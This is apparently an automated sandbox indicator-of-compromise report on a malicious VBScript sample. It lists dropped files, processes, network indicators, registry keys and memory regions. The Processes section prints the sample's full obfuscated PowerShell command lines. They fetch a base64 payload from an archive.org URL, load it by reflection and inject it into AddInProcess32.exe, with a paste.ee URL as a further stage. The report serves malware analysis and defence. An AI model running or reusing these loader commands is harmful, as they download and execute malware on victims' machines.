IOC Report
vr65co3Boo.vbs

loading gif

Files

File Path
Type
Category
Malicious
vr65co3Boo.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anttd1xw.vy5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3v0lstm.sb5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa5ysdpk.0oi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrchnfcv.p12.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\vr65co3Boo.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://paste.ee/d/AaTNM/0
188.114.97.3
malicious
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://ia600100.us.arX
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://ia600100.us.archive.org
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
ia600100.us.archive.org
207.241.227.240

IPs

IP
Domain
Country
Malicious
188.114.97.3
paste.ee
European Union
malicious
148.113.165.11
unknown
United States
malicious
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
156EB570000
trusted library section
page read and write
malicious
156E3597000
trusted library allocation
page read and write
malicious
156D35A4000
trusted library allocation
page read and write
malicious
2811000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
1D7AF320000
heap
page read and write
156D0EF0000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
1D7C97A0000
heap
page read and write
1D7B0C90000
heap
page readonly
1D7AF36A000
heap
page read and write
24B35BF000
stack
page read and write
23CC3E72000
heap
page read and write
285B000
trusted library allocation
page read and write
2AC1A3E000
stack
page read and write
156EB236000
heap
page read and write
2700000
heap
page read and write
7FF848CA4000
trusted library allocation
page read and write
1D7C9592000
heap
page read and write
23CC3E72000
heap
page read and write
23CC3E9F000
heap
page read and write
156D2E28000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
5D8C000
stack
page read and write
7FF848F10000
trusted library allocation
page read and write
3817000
trusted library allocation
page read and write
7FF848E62000
trusted library allocation
page read and write
23CC3E9F000
heap
page read and write
156D1023000
heap
page read and write
284D000
trusted library allocation
page read and write
1D7C9550000
heap
page read and write
23CC245E000
heap
page read and write
23CC2448000
heap
page read and write
156EAFBE000
heap
page read and write
23CC24CB000
heap
page read and write
7FF848E71000
trusted library allocation
page read and write
4E29000
heap
page read and write
156D4B6E000
trusted library allocation
page read and write
1D7B1382000
trusted library allocation
page read and write
156D11A7000
heap
page execute and read and write
1D7B143E000
trusted library allocation
page read and write
156D0FAB000
heap
page read and write
23CC244E000
heap
page read and write
156D0F10000
heap
page read and write
23CC24DD000
heap
page read and write
4CC0000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
1D7C9413000
heap
page read and write
24B32FE000
stack
page read and write
DD0000
heap
page read and write
23CC24CB000
heap
page read and write
28A7000
trusted library allocation
page read and write
1D7AF420000
heap
page read and write
23CC3E72000
heap
page read and write
156D1025000
heap
page read and write
156E2F81000
trusted library allocation
page read and write
23CC3E4E000
heap
page read and write
23CC3E72000
heap
page read and write
28A5000
trusted library allocation
page read and write
D3F01FF000
stack
page read and write
D3F03FF000
stack
page read and write
56E0000
trusted library allocation
page read and write
286B000
trusted library allocation
page read and write
156D0FE4000
heap
page read and write
4D50000
heap
page read and write
25E0000
trusted library allocation
page read and write
50CD000
stack
page read and write
7FF848F70000
trusted library allocation
page read and write
1D7B1479000
trusted library allocation
page read and write
7FF848D86000
trusted library allocation
page execute and read and write
156D45B1000
trusted library allocation
page read and write
1D7AF3AD000
heap
page read and write
23CC2504000
heap
page read and write
D3EFFFD000
stack
page read and write
7FF848EE0000
trusted library allocation
page read and write
23CC249F000
heap
page read and write
23CC3E26000
heap
page read and write
7FF848E7A000
trusted library allocation
page read and write
9DB000
heap
page read and write
23CC3E72000
heap
page read and write
7FF848DA6000
trusted library allocation
page execute and read and write
25C0000
trusted library allocation
page read and write
1D7B1427000
trusted library allocation
page read and write
2AC193D000
stack
page read and write
7DF48E4B0000
trusted library allocation
page execute and read and write
7FF848EF0000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
156EB22B000
heap
page read and write
9AE000
stack
page read and write
23CC24DD000
heap
page read and write
156EB21F000
heap
page read and write
25F0000
trusted library allocation
page execute and read and write
2879000
trusted library allocation
page read and write
156D0EE0000
heap
page read and write
25CB000
trusted library allocation
page execute and read and write
2861000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
1D7B12C0000
heap
page execute and read and write
56D5000
trusted library allocation
page read and write
2AC167E000
stack
page read and write
DD6000
heap
page read and write
23CC2478000
heap
page read and write
289C000
trusted library allocation
page read and write
23CC22A0000
heap
page read and write
7FF848D76000
trusted library allocation
page read and write
156D2D10000
trusted library allocation
page read and write
24B363F000
stack
page read and write
156D4633000
trusted library allocation
page read and write
23CC3E57000
heap
page read and write
7FF848E80000
trusted library allocation
page execute and read and write
156E3F97000
trusted library allocation
page read and write
288A000
trusted library allocation
page read and write
156D339F000
trusted library allocation
page read and write
1D7C132F000
trusted library allocation
page read and write
56F0000
trusted library allocation
page read and write
1D7B0DFA000
heap
page read and write
23CC24D2000
heap
page read and write
4DFB000
heap
page read and write
1D7B147F000
trusted library allocation
page read and write
23CC2670000
heap
page read and write
23CC24CB000
heap
page read and write
1D7C93AE000
heap
page read and write
2AC15FC000
stack
page read and write
24B2D63000
stack
page read and write
2AC177F000
stack
page read and write
23CC3E2A000
heap
page read and write
1D7C9324000
heap
page read and write
156D464C000
trusted library allocation
page read and write
156D102F000
heap
page read and write
156D11F4000
heap
page read and write
D3EF9FE000
stack
page read and write
25B0000
trusted library allocation
page read and write
A8E000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
24B33BE000
stack
page read and write
7FF848E70000
trusted library allocation
page execute and read and write
1D7B1441000
trusted library allocation
page read and write
5920000
heap
page read and write
156D1180000
trusted library allocation
page read and write
23CC3E22000
heap
page read and write
1D7C93AC000
heap
page read and write
643E000
stack
page read and write
4DA3000
heap
page read and write
D3EFCFE000
stack
page read and write
7FF848FD0000
trusted library allocation
page read and write
23CC24D1000
heap
page read and write
286D000
trusted library allocation
page read and write
24B3379000
stack
page read and write
5588000
heap
page read and write
24B327E000
stack
page read and write
23CC2428000
heap
page read and write
4E0F000
heap
page read and write
7FF848E82000
trusted library allocation
page read and write
24B37BB000
stack
page read and write
1D7AF380000
heap
page read and write
1D7AF495000
heap
page read and write
23CC3E72000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
280E000
stack
page read and write
23CC24FA000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
23CC2478000
heap
page read and write
23CC3E46000
heap
page read and write
1D7B13B2000
trusted library allocation
page read and write
1D7B17E7000
trusted library allocation
page read and write
2593000
trusted library allocation
page execute and read and write
289F000
trusted library allocation
page read and write
7FF848E5A000
trusted library allocation
page read and write
56E9000
trusted library allocation
page read and write
156D465D000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page execute and read and write
2AC1173000
stack
page read and write
284A000
trusted library allocation
page read and write
156D1224000
heap
page read and write
23CC3E22000
heap
page read and write
24B30FE000
stack
page read and write
156D33C7000
trusted library allocation
page read and write
4D73000
heap
page read and write
7FF848DE0000
trusted library allocation
page execute and read and write
9E7000
heap
page read and write
4C90000
heap
page read and write
286F000
trusted library allocation
page read and write
156D2E10000
heap
page read and write
24B353E000
stack
page read and write
156D35F7000
trusted library allocation
page read and write
1D7B143B000
trusted library allocation
page read and write
23CC245D000
heap
page read and write
930000
heap
page read and write
24B317D000
stack
page read and write
156D357E000
trusted library allocation
page read and write
1D7C93FF000
heap
page read and write
23CC23A0000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
D3EF8FA000
stack
page read and write
156D4659000
trusted library allocation
page read and write
23CC3E2A000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
1D7C9564000
heap
page read and write
7FF849011000
trusted library allocation
page read and write
1D7AF3A9000
heap
page read and write
1D7B192A000
trusted library allocation
page read and write
7FF848D7C000
trusted library allocation
page execute and read and write
7FF848CAD000
trusted library allocation
page execute and read and write
9B0000
heap
page read and write
7FF848CA3000
trusted library allocation
page execute and read and write
C7E000
stack
page read and write
156D2F70000
heap
page execute and read and write
23CC3E42000
heap
page read and write
5BCC000
stack
page read and write
24B36BE000
stack
page read and write
1D7B142D000
trusted library allocation
page read and write
156D0FA9000
heap
page read and write
2AC17F9000
stack
page read and write
7FF848F50000
trusted library allocation
page read and write
156D3001000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
25A0000
trusted library allocation
page read and write
7FF848EA2000
trusted library allocation
page read and write
2658000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
156D1130000
heap
page read and write
1D7C9320000
heap
page read and write
7FF849033000
trusted library allocation
page read and write
9B8000
heap
page read and write
1D7B142A000
trusted library allocation
page read and write
1D7B1608000
trusted library allocation
page read and write
23CC249F000
heap
page read and write
23CC3EA0000
heap
page read and write
7FF848E51000
trusted library allocation
page read and write
156D3371000
trusted library allocation
page read and write
56C9000
trusted library allocation
page read and write
23CC24FA000
heap
page read and write
494D000
stack
page read and write
23CC3E9F000
heap
page read and write
156D2DE0000
heap
page execute and read and write
7FB40000
trusted library allocation
page execute and read and write
7FF848CD0000
trusted library allocation
page read and write
156D0FBD000
heap
page read and write
23CC3E26000
heap
page read and write
156D0F60000
heap
page read and write
1D7B1444000
trusted library allocation
page read and write
156EB110000
heap
page read and write
23CC3E72000
heap
page read and write
156D4681000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
23CC24D3000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
1D7B1851000
trusted library allocation
page read and write
1D7B0C80000
trusted library allocation
page read and write
7FF848CA2000
trusted library allocation
page read and write
1D7B0DF0000
heap
page read and write
23CC3E23000
heap
page read and write
56EB000
trusted library allocation
page read and write
4F4E000
stack
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
23CC24E0000
heap
page read and write
4E24000
heap
page read and write
23CC43D5000
heap
page read and write
8F9000
stack
page read and write
2874000
trusted library allocation
page read and write
1D7AF3A7000
heap
page read and write
2AC16FF000
stack
page read and write
23CC2448000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
156D31A2000
trusted library allocation
page read and write
2853000
trusted library allocation
page read and write
9E5000
heap
page read and write
23CC43F4000
heap
page read and write
156EB420000
heap
page read and write
23CC3F80000
heap
page read and write
56A4000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
24B31FF000
stack
page read and write
23CC3E72000
heap
page read and write
1D7B12E0000
heap
page execute and read and write
1D7B1310000
heap
page read and write
1D7AF360000
heap
page read and write
25C7000
trusted library allocation
page execute and read and write
23CC24DE000
heap
page read and write
156D11F6000
heap
page read and write
285F000
trusted library allocation
page read and write
1D7AF490000
heap
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
1D7AF3F5000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
D3F00FE000
stack
page read and write
7FF848FB0000
trusted library allocation
page read and write
156D1160000
trusted library allocation
page read and write
23CC3E5E000
heap
page read and write
23CC3E2D000
heap
page read and write
508D000
stack
page read and write
156D335C000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
4F8E000
stack
page read and write
4CC7000
trusted library allocation
page read and write
23CC2504000
heap
page read and write
156D11A0000
heap
page execute and read and write
7FF848F90000
trusted library allocation
page read and write
51CE000
stack
page read and write
7FF848D5C000
trusted library allocation
page execute and read and write
156EB202000
heap
page read and write
647C000
stack
page read and write
5AC000
stack
page read and write
23CC3E64000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
23CC3E2A000
heap
page read and write
1D7B1343000
trusted library allocation
page read and write
156D3368000
trusted library allocation
page read and write
23CC2420000
heap
page read and write
156D4893000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
1D7C93DA000
heap
page read and write
156E3277000
trusted library allocation
page read and write
24B373E000
stack
page read and write
1D7AF417000
heap
page read and write
7FF848CC2000
trusted library allocation
page read and write
2AC19BB000
stack
page read and write
58DE000
stack
page read and write
23CC24DA000
heap
page read and write
23CC3E36000
heap
page read and write
2AC1BBE000
stack
page read and write
4E18000
heap
page read and write
2869000
trusted library allocation
page read and write
1D7C93E7000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
156EB1F0000
heap
page read and write
4D40000
heap
page execute and read and write
156D2D40000
trusted library allocation
page read and write
156D0F7E000
heap
page read and write
156D0F9D000
heap
page read and write
23CC3E3C000
heap
page read and write
23CC3E22000
heap
page read and write
156EB23A000
heap
page read and write
156EB253000
heap
page read and write
23CC2485000
heap
page read and write
156D0F72000
heap
page read and write
4E08000
heap
page read and write
557E000
heap
page read and write
1D7B166E000
trusted library allocation
page read and write
23CC2504000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
23CC3E20000
heap
page read and write
23CC2447000
heap
page read and write
23CC2380000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
1D7C9470000
heap
page read and write
23CC2478000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
7FF848CCD000
trusted library allocation
page execute and read and write
156D1190000
heap
page readonly
156D0FA5000
heap
page read and write
1D7B0C60000
trusted library allocation
page read and write
1D7B0D77000
heap
page execute and read and write
D3EFDFF000
stack
page read and write
1D7B1321000
trusted library allocation
page read and write
24B307F000
stack
page read and write
7FF848FB0000
trusted library allocation
page read and write
156EB234000
heap
page read and write
927000
heap
page read and write
2AC14FE000
stack
page read and write
23CC3E2A000
heap
page read and write
966000
heap
page read and write
156EAF80000
heap
page read and write
4D3E000
stack
page read and write
2876000
trusted library allocation
page read and write
156D11F0000
heap
page read and write
25C2000
trusted library allocation
page read and write
2AC183E000
stack
page read and write
1D7C9322000
heap
page read and write
7FF848CBB000
trusted library allocation
page read and write
25B2000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
287B000
trusted library allocation
page read and write
156D4867000
trusted library allocation
page read and write
156D2D42000
trusted library allocation
page read and write
67FE000
stack
page read and write
7FF848CC3000
trusted library allocation
page execute and read and write
23CC43F3000
heap
page read and write
1D7B0D70000
heap
page execute and read and write
24B3437000
stack
page read and write
2AC147E000
stack
page read and write
7FF848EE0000
trusted library allocation
page read and write
23CC43D0000
heap
page read and write
538E000
stack
page read and write
7FF848FC0000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
156D3FF7000
trusted library allocation
page read and write
573E000
stack
page read and write
156D4639000
trusted library allocation
page read and write
24B420D000
stack
page read and write
2AC11FE000
stack
page read and write
2600000
heap
page execute and read and write
7FF848D56000
trusted library allocation
page read and write
156EB028000
heap
page read and write
9CF000
heap
page read and write
7FF848CB0000
trusted library allocation
page read and write
156D1028000
heap
page read and write
960000
heap
page read and write
400000
remote allocation
page execute and read and write
23CC3E49000
heap
page read and write
156D2F81000
trusted library allocation
page read and write
2AC1ABE000
stack
page read and write
23CC24CB000
heap
page read and write
1D7B13A8000
trusted library allocation
page read and write
23CC43D6000
heap
page read and write
D3F02FB000
stack
page read and write
2590000
trusted library allocation
page read and write
56C6000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page execute and read and write
7FF848D70000
trusted library allocation
page read and write
910000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
1D7C9373000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
D3EFAFE000
stack
page read and write
7FF849024000
trusted library allocation
page read and write
156D4C37000
trusted library allocation
page read and write
156EB23E000
heap
page read and write
5A0E000
stack
page read and write
550B000
heap
page read and write
285D000
trusted library allocation
page read and write
24B2DEF000
stack
page read and write
7FF848EF0000
trusted library allocation
page read and write
156D1220000
heap
page read and write
25BA000
trusted library allocation
page execute and read and write
23CC2675000
heap
page read and write
23CC3E74000
heap
page read and write
1D7C93FA000
heap
page read and write
2871000
trusted library allocation
page read and write
23CC3E39000
heap
page read and write
2580000
trusted library allocation
page read and write
2594000
trusted library allocation
page read and write
156D0F69000
heap
page read and write
7FF848E90000
trusted library allocation
page execute and read and write
23CC3E21000
heap
page read and write
5A4E000
stack
page read and write
66FE000
stack
page read and write
7FF849028000
trusted library allocation
page read and write
23CC24FA000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
23CC2448000
heap
page read and write
156D0F9F000
heap
page read and write
23CC2485000
heap
page read and write
1D7B0D10000
trusted library allocation
page read and write
156E3269000
trusted library allocation
page read and write
1D7B0DF6000
heap
page read and write
26F0000
trusted library allocation
page read and write
156EB013000
heap
page read and write
1D7C956C000
heap
page read and write
23CC3E72000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
484C000
stack
page read and write
1D7AF440000
heap
page read and write
156E2F90000
trusted library allocation
page read and write
156EB227000
heap
page read and write
4DD3000
heap
page read and write
1D7C932F000
heap
page read and write
1D7AF368000
heap
page read and write
156D339D000
trusted library allocation
page read and write
657E000
stack
page read and write
40E000
remote allocation
page execute and read and write
156D3375000
trusted library allocation
page read and write
2AC1C3B000
stack
page read and write
5900000
heap
page read and write
23CC3E72000
heap
page read and write
1D7C1321000
trusted library allocation
page read and write
3811000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
1D7C9375000
heap
page read and write
56B4000
trusted library allocation
page read and write
2AC18B6000
stack
page read and write
23CC3E72000
heap
page read and write
1D7C9328000
heap
page read and write
5D4E000
stack
page read and write
5CCD000
stack
page read and write
920000
heap
page read and write
7FF848CA0000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
23CC3E5F000
heap
page read and write
1D7B133B000
trusted library allocation
page read and write
156D48ED000
trusted library allocation
page read and write
4DF5000
heap
page read and write
7FF848CC4000
trusted library allocation
page read and write
156D3379000
trusted library allocation
page read and write
5910000
trusted library allocation
page read and write
156D11B0000
trusted library allocation
page read and write
25B6000
trusted library allocation
page execute and read and write
2AC157E000
stack
page read and write
24B34B8000
stack
page read and write
5D0E000
stack
page read and write
7FF848F70000
trusted library allocation
page read and write
1D7C138E000
trusted library allocation
page read and write
259D000
trusted library allocation
page execute and read and write
7FF848E60000
trusted library allocation
page execute and read and write
1D7B1918000
trusted library allocation
page read and write
23CC3E72000
heap
page read and write
264E000
stack
page read and write
156D3366000
trusted library allocation
page read and write
24B418E000
stack
page read and write
548E000
stack
page read and write
156E2FEE000
trusted library allocation
page read and write
156D4C33000
trusted library allocation
page read and write
2883000
trusted library allocation
page read and write
1D7AF470000
heap
page read and write
1D7AF230000
heap
page read and write
1D7AF36E000
heap
page read and write
There are 499 hidden memdumps, click here to show them.